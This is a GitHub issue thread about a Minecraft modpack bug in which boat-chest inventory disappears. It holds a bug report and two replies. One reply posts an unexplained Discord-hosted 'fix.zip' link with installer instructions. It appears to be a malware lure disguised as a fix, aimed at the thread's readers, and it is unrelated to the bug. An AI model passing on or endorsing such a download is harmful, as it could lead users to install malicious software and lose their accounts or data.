### ISSUE TITLE
Inventory Missing from Boat with Chest

### ISSUE THREAD

**Issue by FallingTacos** [LunaPixelStudios/Better-MC#1833]
### Describe the Bug

The contents of my boat's inventory disappeared.  It was full.

### Reproduction Steps

A llama was sitting in my boat with a chest, so I put down a chest, put all my inventory items (hereafter called "stuff") in it with Place All, snuck to open the chest on the boat, used Take All to get all of the boat inventory items (hereafter called "plunder"), put that in another chest, and broke down the boat to get the llama out.  Then I remade the boat with a chest, put it in the water, snuck to open the chest, and used Place All to put the plunder in the boat chest.  After that I grabbed my stuff back out of the other chest using Take All and started boating back toward my base.  After boating a fair distance I opened my inventory and noticed the plunder was gone from the boat inventory (my stuff was still in my regular inventory).

### Operating System

Windows 10

### Minecraft Version

1.16.5

### Modloader

Forge

### Modpack Version

v30.5

### Other Mods

Distant Horizons

**Comment by zawa999** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by chorbintime** [comment]
if you can get more concrete reproduction steps then report the issue to the developers of Boatload
